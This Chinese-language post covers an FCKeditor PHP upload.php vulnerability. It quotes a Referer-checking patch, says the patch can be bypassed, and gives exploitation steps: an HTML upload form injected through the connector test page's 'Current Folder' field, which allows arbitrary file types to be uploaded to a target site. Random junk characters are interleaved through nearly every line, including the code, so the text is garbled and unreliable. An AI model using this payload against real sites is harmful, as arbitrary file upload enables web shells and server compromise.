漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
2 g/ s6 M( W! ?' L# v& [网上给出的修复方案是
5 s$ n' g) T/ R8 B修复方法,删除FCK编辑器用其他的编辑器
2 z* R+ W. V) n: F) E/ K3 B! O或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件) Y( A( D1 S( X9 F
在4 B! }9 L6 j. O$ f
require(‘config.php’);
2 ^& ]- h. ]3 t3 x2 P) k, |, G* Rrequire(‘util.php’);
, T$ W# i9 h3 A1 W: G的下面添加以下代码—————————–
d2 S3 F3 C; T$ Y ~- p//防止外部提交6 \# }; m) f# l7 C
function outsidepost(), k' }& f; G! P+ [
{" s+ i+ x8 i' q5 o
$servername=$_SERVER['SERVER_NAME'];
9 {1 w; ~& }% Q1 a) ]$ I) ]4 Z7 Y2 _$sub_from=@$_SERVER['HTTP_REFERER'];1 Q$ D9 ^9 j5 y. f8 T
$sub_len=strlen($servername);
4 }& u) ^2 F5 Q0 S( p. s$checkfrom=substr($sub_from,7,$sub_len);
, k7 o- A- c1 Lif($checkfrom!=$servername){, j& E# j' \5 y
echo(“you don’t outsidepost!”);
* e! B5 G2 ]. O0 o+ Gexit;8 F1 W0 g; q f. H! }8 y
}
0 E5 L% q4 k! \% C& ^4 _& k/ \}
2 p# k M: e; s& @- Loutsidepost();
1 Z0 t; f8 \( \- j3 ] H$ n+ P3 \防止外部提交,但是没有防止内部提交,
6 |% \. n, x; G; `- M( n, V利用方法:
2 c, E2 L8 q6 o! @1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
6 z; s* ]" ~3 _$ P6 o2,在Current Folder 框输入$ q- n& x! U! y1 t g3 z+ S$ N
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form> \' r7 f7 x3 I3 O; p
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。% S6 Q- E* v ~& q* p, N
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |